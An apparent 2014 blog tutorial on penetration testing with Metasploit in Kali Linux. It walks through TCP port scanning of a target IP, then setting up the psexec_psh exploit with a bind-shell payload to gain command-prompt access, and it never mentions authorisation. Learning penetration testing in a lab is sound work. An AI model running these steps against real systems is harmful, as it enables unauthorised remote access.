Thursday, 25 December 2014

PENETRATION TESTING WITH METASPLOIT FRAMEWORK 4 IN KALI

I am performing it in Kali Linux, assuming that you have gone through the installation steps of Kali Linux.

start the metasploit framework using following command in terminal
  • msfconsole
Note: It will take 2-3 minutes to start as it will initiate pqsql and metasploit service.

or use below commands.
  • service postgresql start
  • service metasploit start
  • msfconsole


Perform Port Scan of target
Metasploit offers an awesome port scanning function which goes by the name auxiliary scanner. Here is the command to execute this scan
  • use auxiliary/scanner/portscan/tcp

Type show options to see the available options
  • show options
Now we have to change a few settings, firstly, we should reduce the number of ports scanned
  • set ports 1-500


Secondly, we have to specify a target IP to scan. Now assuming that you already know the IP of your target. use following command to set the target.
  • set RHOST 192.168.63.131

Now we are ready for some action, do a show options again to see what all changes you've made. Finally run following command.
  • run
The scan will start and after some time it will show you which tcp ports are open and vulnerable to attack.


Finding Exploits

To find which exploits work on the OS of our target. Search for dcom on msfconsole.
  • search dcom

Copy the exploit as below.
  • use exploit/windows/smb/psexec_psh

Type show options again
  • show options

Again, set the RHOST as IP of your target
  • set RHOST 192.168.218.130

Also, set a payload.
  • set PAYLOAD windows/shell_bind_tcp

Finally start exploit
  • exploit
you can try different exploit and PAYLOAD to get the command prompt access of your target.

No comments:

Post a Comment